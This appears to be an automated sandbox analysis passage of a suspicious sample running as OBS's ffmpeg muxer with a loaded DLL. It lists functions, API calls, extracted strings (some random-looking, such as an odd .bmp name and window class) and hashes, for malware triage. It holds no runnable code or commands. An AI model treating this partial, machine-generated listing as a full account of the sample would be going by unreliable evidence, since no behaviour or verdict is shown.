                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 313767242-0
                                                            • Opcode ID: 8e29f9cfb3282d508510f87b074f2afb23630758b427b43b81c2847ae2e7d6a0
                                                            • Instruction ID: 36377444451dbec8ee4dac8adbb7b2b17bc4c0cbb7f68ca26c088fd0bf45a7a1
                                                            • Opcode Fuzzy Hash: 8e29f9cfb3282d508510f87b074f2afb23630758b427b43b81c2847ae2e7d6a0
                                                            • Instruction Fuzzy Hash: 61312C76609E8196FB60AF60E8507EDB360FB88754F84443ADA4D47A98EF38E54CC720
                                                            Function 00007FFDA38267D0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 1239891234-0
                                                            • Opcode ID: 2194b634b8c591eac8e1cd1d36c29180413983ef8b20f5943d3b624b13cf5eff
                                                            • Instruction ID: 5c2ca3e0e1a89a45611c8d01c3944ae375dfdd37b7ccb23dc2f5424385ac189d
                                                            • Opcode Fuzzy Hash: 2194b634b8c591eac8e1cd1d36c29180413983ef8b20f5943d3b624b13cf5eff
                                                            • Instruction Fuzzy Hash: 88318F32709B8186DB60CF35E8502AE73A1FB88754F540136EA9D53B96DF3ED545CB04
                                                            Function 00007FFDA382FDCC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: InfoLocale
                                                            • String ID: GetLocaleInfoEx
                                                            • API String ID: 2299586839-2904428671
                                                            • Opcode ID: 6e732f5e732e50c2afe8612565c4dd4846509a9384a69e69c65b02c4743d18cd
                                                            • Instruction ID: f79b03962acf0a2d99dd2f9c21c10bf7c11847628c125f10e2b249636ebc32fb
                                                            • Opcode Fuzzy Hash: 6e732f5e732e50c2afe8612565c4dd4846509a9384a69e69c65b02c4743d18cd
                                                            • Instruction Fuzzy Hash: 9901A724B0974186EB058B66B4500AAA362EF8CBD0F544076DE5D27B57CE3ED541C784
                                                            Function 00007FFDA382F94C Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FFDA382FD9B,?,?,?,?,?,?,?,?,00000000,00007FFDA3837B38), ref: 00007FFDA382F99B
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: EnumLocalesSystem
                                                            • String ID:
                                                            • API String ID: 2099609381-0
                                                            • Opcode ID: 007a0ee636362a66d880f0fa33426caab728f0c53ba04d0680f99ccb34fb51a1
                                                            • Instruction ID: 8dd26a99fd7ce16eef542abb38155ae2ab4fc050ebbc66a16e263cd16d37a703
                                                            • Opcode Fuzzy Hash: 007a0ee636362a66d880f0fa33426caab728f0c53ba04d0680f99ccb34fb51a1
                                                            • Instruction Fuzzy Hash: B4F08172B05A4583E700DB65F9A01A96362FB9D7C0F948075EA1DA3366DE3ED460C708
                                                            Function 00007FF71E7425C0 Relevance: 51.0, APIs: 6, Strings: 23, Instructions: 206COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF71E742570: printf.MSPDB140-MSVCRT ref: 00007FF71E742587
                                                              • Part of subcall function 00007FF71E742530: atoi.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,00000000,00007FF71E742617,?,?,?,00007FF71E741BD6,?,?,?,00007FF71E741A02), ref: 00007FF71E742552
                                                            • puts.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF71E741BD6,?,?,?,00007FF71E741A02), ref: 00007FF71E7428DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: atoiprintfputs
                                                            • String ID: Invalid number of audio tracks$Invalid number of video tracks$Must have at least 1 audio track or 1 video track$audio codec$audio track count$file name$muxer settings$stream key$video bitrate$video chroma sample location$video codec$video codec tag$video color primaries$video color range$video color trc$video colorspace$video fps den$video fps num$video height$video max luminance$video track count$video width${stream_key}
                                                            • API String ID: 3402752964-4246942696
                                                            • Opcode ID: bbb72588bee9787a683502761444138c14bf0f1375247d53f9cdc5c5b4da8170
                                                            • Instruction ID: 477ff876ac398e144cb24eabe097cbaa7a025381f3e2a6817c44954c617c27f5
                                                            • Opcode Fuzzy Hash: bbb72588bee9787a683502761444138c14bf0f1375247d53f9cdc5c5b4da8170
                                                            • Instruction Fuzzy Hash: 49811875908A9691FA14FB91E6145F8A396AB0DFE0BC10072DD0D47A95AF3CF21ED320
                                                            Function 00007FF71E741C50 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 215COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: memmove$os_event_destroy$__acrt_iob_func__stdio_common_vfprintffclosefprintfmallocpthread_mutex_lock
                                                            • String ID: Error allocating memory for output$Error writing to '%s', %s
                                                            • API String ID: 161919314-4070097938
                                                            • Opcode ID: a31c7b85b8c0d82d0157cb35a6e72543ed071c06804e902690462ed57beb3fc0
                                                            • Instruction ID: 2cb51f32ce8ed0f497d9b8e006b31d22b812a8d7621eaf36defe1847152a88a3
                                                            • Opcode Fuzzy Hash: a31c7b85b8c0d82d0157cb35a6e72543ed071c06804e902690462ed57beb3fc0
                                                            • Instruction Fuzzy Hash: E4A13C32B19E8685E751AF21E4403F9A3A1FB8DBA8F844031DE8D17B59DF78E54D8720
                                                            Function 00007FF71E741A40 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 87stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF71E741A6D
                                                              • Part of subcall function 00007FF71E742030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E74204A
                                                              • Part of subcall function 00007FF71E742030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E742065
                                                              • Part of subcall function 00007FF71E742030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E742080
                                                              • Part of subcall function 00007FF71E742030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E74209B
                                                              • Part of subcall function 00007FF71E742030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E7420B6
                                                            • avformat_network_init.AVFORMAT-60 ref: 00007FF71E741A85
                                                            • av_guess_format.AVFORMAT-60 ref: 00007FF71E741AAF
                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF71E741ABC
                                                            • fprintf.MSPDB140-MSVCRT ref: 00007FF71E741AD0
                                                            • avformat_alloc_output_context2.AVFORMAT-60 ref: 00007FF71E741AEC
                                                            • av_strerror.AVUTIL-58 ref: 00007FF71E741B19
                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF71E741B23
                                                            • fprintf.MSPDB140-MSVCRT ref: 00007FF71E741B38
                                                              • Part of subcall function 00007FF71E742910: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF71E741B4C), ref: 00007FF71E742939
                                                              • Part of subcall function 00007FF71E742370: avcodec_free_context.AVCODEC-60 ref: 00007FF71E742388
                                                              • Part of subcall function 00007FF71E742370: av_free.AVUTIL-58 ref: 00007FF71E7423B1
                                                              • Part of subcall function 00007FF71E742370: avio_context_free.AVFORMAT-60 ref: 00007FF71E7423BD
                                                              • Part of subcall function 00007FF71E742370: avformat_free_context.AVFORMAT-60 ref: 00007FF71E7423CC
                                                              • Part of subcall function 00007FF71E742370: avcodec_free_context.AVCODEC-60 ref: 00007FF71E742402
                                                              • Part of subcall function 00007FF71E742370: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF71E742415
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: strncmp$__acrt_iob_funcavcodec_free_contextfprintf$av_freeav_guess_formatav_strerroravformat_alloc_output_context2avformat_free_contextavformat_network_initavio_context_freecallocfree
                                                            • String ID: Couldn't find an appropriate muxer for '%s'$Couldn't initialize output context: %s$http$mpegts$video/M2PT
                                                            • API String ID: 3777911973-2524251934
                                                            • Opcode ID: 078559d49e555ef7517477361438487f95b7fa6d5945ffa6822e70d97715306d
                                                            • Instruction ID: 0d0daa45297ee84c1574ee18251f843f191e1a05f48263bfe6bbcccb9f16e50d
                                                            • Opcode Fuzzy Hash: 078559d49e555ef7517477361438487f95b7fa6d5945ffa6822e70d97715306d
                                                            • Instruction Fuzzy Hash: 3F31A231B18E8242FB20BB25F4112BAA391AF8DBB4FD05235ED5D47695EE2CF44C8720
                                                            Function 00007FFDA3787980 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 80windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Object$DeletePaintSelect$BeginCompatibleCreateImageLoadMessagePostProcQuitWindow
                                                            • String ID: $ymmvaxnnqpelgql.bmp
                                                            • API String ID: 2450474488-3406428242
                                                            • Opcode ID: f938f299d0a6a8bdbbcbd98ec490e40a93742d2f5315c66812953dffc706aadb
                                                            • Instruction ID: aec002bce7784bce1e38fe0ec50aaf5a682da20fe805b6a4033f02e56f28b736
                                                            • Opcode Fuzzy Hash: f938f299d0a6a8bdbbcbd98ec490e40a93742d2f5315c66812953dffc706aadb
                                                            • Instruction Fuzzy Hash: AA41FE3660DB82C6E7208F25F46436EB762FB88791F100175D68E52B69CF7ED488CB44
                                                            Function 00007FF71E7414B0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 164COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: __acrt_iob_funcav_content_light_metadata_allocav_mastering_display_metadata_allocav_memdupav_stream_add_side_dataavcodec_alloc_context3avcodec_descriptor_get_by_name
                                                            • String ID: 2$Couldn't find codec '%s'$E
                                                            • API String ID: 3726879996-2734579634
                                                            • Opcode ID: 984bf621481a9a25f05ee9f8f0874bf5fd16c3df77fd558344dbfddc274f0f6a
                                                            • Instruction ID: 961ef1ecf28de4bdececd207ceb0ae2cee8b4b740aeeb2f90fb11d999697c06d
                                                            • Opcode Fuzzy Hash: 984bf621481a9a25f05ee9f8f0874bf5fd16c3df77fd558344dbfddc274f0f6a
                                                            • Instruction Fuzzy Hash: DF81F476608B848BD754DF25E54035DBBF0F789B98F50402AEB8C87B58DB7AE858CB00
                                                            Function 00007FF71E741250 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 144COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: __acrt_iob_func$avcodec_descriptor_get_by_nameavcodec_find_encoder
                                                            • String ID: Couldn't find codec '%s'$Couldn't find codec descriptor '%s'$title
                                                            • API String ID: 3715327632-3279048111
                                                            • Opcode ID: c9720edbb9d548ebec2452977bce4eb4d803eed367fb80ba86fd3ea18017a218
                                                            • Instruction ID: 8af64f95d3f60c18776e200f0862d0fd04e60bfe77e803019aac43efab5a3b3b
                                                            • Opcode Fuzzy Hash: c9720edbb9d548ebec2452977bce4eb4d803eed367fb80ba86fd3ea18017a218
                                                            • Instruction Fuzzy Hash: 23618A72704B8486EB15EF16F5903A9B7A0FB88BA8F854035DE4E477A4DF38E069C710
                                                            Function 00007FF71E7417A0 Relevance: 19.6, APIs: 13, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: os_event_destroy$free$av_packet_freeav_write_trailerpthread_joinpthread_mutex_destroypthread_mutex_lockpthread_mutex_unlock
                                                            • String ID:
                                                            • API String ID: 2998719300-0
                                                            • Opcode ID: 8bdf6fd2e92e54ef71616242ce810bf52dd6c25259264d2bdbef31b8de60417c
                                                            • Instruction ID: 0b7ed1979f00911203039133b9ff4e34a6e7b6b118c5b9c469c6d5cf5cd38691
                                                            • Opcode Fuzzy Hash: 8bdf6fd2e92e54ef71616242ce810bf52dd6c25259264d2bdbef31b8de60417c
                                                            • Instruction Fuzzy Hash: AB31FF32A18E8291FB51FF35D4513F8A3A0FF99F58F884131DA4D4A196EF29A58D8360
                                                            Function 00007FFDA378B4A0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 66registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: ClassCreateRegisterWindow
                                                            • String ID: DrawingApp$nnwfzbyyokwcvrswbbm
                                                            • API String ID: 3469048531-3182045650
                                                            • Opcode ID: 67f015d44b4e2b0e2eda48759fa467bac14c15775e518013fdbca704f1913655
                                                            • Instruction ID: 2e7d3dab85f5fef5a00a307e1c3bf678a528ce0073ef030c217bd2c89da8cf00
                                                            • Opcode Fuzzy Hash: 67f015d44b4e2b0e2eda48759fa467bac14c15775e518013fdbca704f1913655
                                                            • Instruction Fuzzy Hash: 0D312B32609B8586E7608B20F86436EB7A5FB88385F500135D68E52B69DF7ED184CB44
                                                            Function 00007FFDA37824A0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Yarn$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                            • String ID: bad locale name
                                                            • API String ID: 3904239083-1405518554
                                                            • Opcode ID: 315476c88add638def5cd1a661ea6bacc12a5953799f342fadb73ad74f07bb65
                                                            • Instruction ID: e812439fb147fd40987e218d02322edcf7e6a2f024a092603d1652e5526b2ac0
                                                            • Opcode Fuzzy Hash: 315476c88add638def5cd1a661ea6bacc12a5953799f342fadb73ad74f07bb65
                                                            • Instruction Fuzzy Hash: 66113052F6F74242DD44E72AF4A566E6352EFC2B81F406436FA8E23767CE2DD0518708
                                                            Function 00007FF71E742030 Relevance: 15.0, APIs: 5, Strings: 5, Instructions: 41stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E74204A
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E742065
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E742080
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E74209B
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E7420B6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: strncmp
                                                            • String ID: http$rist$srt$tcp$udp
                                                            • API String ID: 1114863663-504309389
                                                            • Opcode ID: d2521f5543573ed7a9b47c763349208ce3ea302e6d5c14a99d4cb2250db2cd2e
                                                            • Instruction ID: b0dfe5586473410b06c11eb64756f5903fafa8f77c67c42125a03444a96a5175
                                                            • Opcode Fuzzy Hash: d2521f5543573ed7a9b47c763349208ce3ea302e6d5c14a99d4cb2250db2cd2e
                                                            • Instruction Fuzzy Hash: 9F01F7B0B14D0781FB226B66E440624A3A4AF4DFA5FC4503AC90D4BAA0DF2DF65EC730
                                                            Function 00007FF71E742160 Relevance: 13.6, APIs: 9, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: os_event_destroy$memmovepthread_mutex_lockpthread_mutex_unlock
                                                            • String ID:
                                                            • API String ID: 4207702331-0
                                                            • Opcode ID: 2ecd02ec26d4cc9ba7addf2ffba6d2c38598a6939d4a4f97ceb40f02c73610ba
                                                            • Instruction ID: cef49c223136717e1d592017578f05debd0ea11ca310f2f266906a197902897d
                                                            • Opcode Fuzzy Hash: 2ecd02ec26d4cc9ba7addf2ffba6d2c38598a6939d4a4f97ceb40f02c73610ba
                                                            • Instruction Fuzzy Hash: B3417872618E8581E611EF15E4403BDA760FB99BE8F840031EF8D07B5ACF38E5A98720
                                                            Function 00007FF71E7435E4 Relevance: 13.6, APIs: 9, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: __p___argc__p___wargv__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_release_startup_lock_cexit_exit_get_initial_wide_environment_register_thread_local_exe_atexit_callback
                                                            • String ID:
                                                            • API String ID: 1184979102-0
                                                            • Opcode ID: d1267e791b308d50114738cb6d3fcce0682459912f5f90b2ba963487117e6561
                                                            • Instruction ID: ed94904b330223c2bc4143b2a5a417f75b8fa78a40014c952d59b7b3a639dbed
                                                            • Opcode Fuzzy Hash: d1267e791b308d50114738cb6d3fcce0682459912f5f90b2ba963487117e6561
                                                            • Instruction Fuzzy Hash: 83314871A08E43A1FA14BB24E4513B9E291AF5D7A4FD44035EA4D4B6E7EE2CF80C8731
